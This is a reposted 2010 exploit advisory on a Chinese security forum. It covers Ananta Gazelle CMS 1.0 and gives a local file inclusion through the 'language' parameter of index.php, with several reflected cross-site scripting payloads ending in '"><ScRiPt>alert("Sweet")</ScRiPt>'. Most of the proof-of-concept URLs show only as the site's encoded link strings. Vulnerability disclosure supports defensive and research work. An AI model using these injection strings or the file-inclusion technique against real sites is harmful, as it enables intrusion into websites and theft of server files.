[转帖]Ananta Gazelle CMS Multiple Vulnerabilities-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]Ananta Gazelle CMS Multiple Vulnerabilities

发表于: 2010-8-25 11:12 1893

[转帖]Ananta Gazelle CMS Multiple Vulnerabilities

freebsdlin 活跃值

2010-8-25 11:12

1893

############################################################################
#                                                                         #
# Exploit Title: Ananta_Gazelle Local File inclusion / Xss Vulnerabilities #
#                                                                         #
# Date: 23/08/2010                                                       #
#                                                                         #
# Author: Sweet                                                          #
#                                                                         #
# Contact : charif38@hotmail.fr                                           #
#                                                                         #
# Software Link: 00cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4F1j5h3&6@1j5i4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3U0k6F1j5Y4y4H3i4K6y4n7                                     #
#                                                                         #
# Download:c70K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4F1j5h3&6@1j5i4y4G2k6Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9K6c8V1N6S2P5X3g2D9L8r3g2Q4x3U0f1J5x3p5y4y4f1#2)9J5c8V1c8G2N6$3&6D9L8$3q4V1i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.    #
#                                                                         #
# Version: Ananta_Gazelle1.0                                              #
#                                                                         #
# Tested on: WinXp sp3                                                    #
#                                                                         #
#                                                                         #
#                                                                         #
#                                                                         #
# Description : Gazelle is fast, free and requires no learning          #
#                                                                         #
# you can just dive in with the content and make a big site             #
#                                                                         #
############################################################################

1-Local File Inclusion :

Input passed to to the "language" parameter in index.php isn't properly verified, before it is used to include files
This can be exploited to include arbitrary files from local resources

cb2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3N6r3g2E0M7r3I4S2N6r3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6T1L8$3!0@1i4K6u0W2K9h3&6A6i4K6t1#2x3o6l9`.

d61K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8X3q4V1L8h3W2F1i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6@1k6h3#2H3L8r3q4@1k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8W2)9J5k6g2)9J5k6g2)9J5c8X3u0G2L8%4c8Q4x3X3g2A6L8X3W2Q4x3U0f1H3x3l9`.`.

Screen <=> e64K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3W2E0k6K6f1@1x3g2)9J5k6h3W2E0j5h3N6W2M7$3S2S2j5$3E0Q4x3X3g2#2M7#2)9J5c8X3W2E0k6K6f1@1x3g2)9J5c8U0x3@1z5o6u0Q4x3V1k6S2L8X3q4F1N6r3q4Q4x3X3g2H3L8X3M7`.

2-Xss :

49dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8X3k6G2M7X3N6G2N6q4)9J5k6i4m8Z5M7q4)9J5c8W2)9J5y4X3N6@1i4K6y4n7"><ScRiPt>alert("Sweet")</ScRiPt>

9d0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8Y4y4W2j5i4u0U0K9q4)9J5k6i4m8Z5M7q4)9K6c8X3I4G2L8$3E0#2M7q4)9K6c8o6q4Q4x3U0k6Y4N6q4)9K6b7W2)9J5y4#2)9J5y4X3N6@1i4K6y4n7i4K6t1$3L8s2c8Q4x3@1u0e0j5#2u0A6f1s2c8Q4x3U0f1J5x3q4)9J5y4e0m8S2i4K6t1#2x3r3c8Q4x3U0k6Y4N6q4)9K6b7X3q4D9k6i4u0@1i4K6t1^5"Sweet")%3B</ScRiPt>

71dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8Y4u0W2k6$3W2K6N6r3g2J5i4K6u0W2M7r3S2H3i4K6y4r3i4K6y4p5i4K6t1$3k6%4c8Q4x3@1t1`."'><ScRiPt>alert("Sweet")</ScRiPt>

124K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6m8L8X3q4F1N6r3q4b7j5i4c8U0K9q4)9J5c8X3q4V1L8h3W2F1i4K6u0r3i4K6y4r3i4K6y4p5i4K6t1$3k6%4c8Q4x3@1t1`."'><ScRiPt>alert("Sweet")</ScRiPt>

Saha Ftourkoum et 1,2,3 viva L'Algerie :))

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・1

免费・0

支持